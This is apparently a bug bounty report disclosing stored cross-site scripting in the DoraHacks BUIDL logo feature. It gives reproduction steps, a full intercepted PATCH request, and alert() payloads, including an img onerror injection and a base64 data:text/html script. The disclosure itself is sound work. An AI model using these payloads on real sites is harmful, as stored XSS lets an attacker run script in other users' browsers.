Description
hi team
I see the image values in the BUIDLs logo feature are not validating properly.
where as when an attacker creates an XSS payload then edits it into the BUIDLs logo URL, it will be accepted and the XSS will be triggered when someone opens the Image Tab in Chrome or Edge browser.
production steps:
1. create or edit your BUIDL at https://dorahacks.io/home
2. Then intercept the BUIDL edit request using Brupsuite :
sample request:
PATCH /api/hack-list/self-projects/4677/ HTTP/1.1
Host: dorahacks.io
Cookie: -
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Hackerlink-Token: 641c03db26dd56d90e1553c671fead50
Content-Length: 682
Origin: https://dorahacks.io
Referer: https://dorahacks.io/home
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"name":"XSSttestes","source":"Grants-","tech_trees":[0],"infrastructure_tags":[1,10,91,92],"other_infrastructures":["infra:\"><img src=/ onerror=alert(1)> {{4*4}}"],"vision":"XSS","project_description":"\"><img src=/ onerror=alert(1)> {{4*4}}","pictures":["data:text/html;base64,PHNjcmlwdD5hbGVydCgiZG9yYWhhY2tzLmlvIik8L3NjcmlwdD4K"],"contact":"11111","members":[{"email":"***@***","nickname":null,"avatar":null}],"team_description":"\"><img src=/ onerror=alert(1)> {{4*4}}","github_page":"https://github.com","demo_link":"https://demo.com","demo_video":"https://demo.com","twitter":"tetes","facebook":"https://facebook.com/testes","discord":"testes","whatsapp":null,"wechat":null}
3. Then change the "pictures" value to the XSS payload URL
XSS payloads:
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiZG9yYWhhY2tzLmlvIik8L3NjcmlwdD4K
open hashing payload XSS base64 :
- data:text/html;base64,<script>alert(1)</script>
4. after saving, then open the image tab, and see !! XSS will be triggered
POC videos :
- https://drive.google.com/file/d/1hbx7l77a7remCEyRqa3CJr-_gEJgwb9z/view?usp=sharing
impact :
XSS through the BUIDL logo feature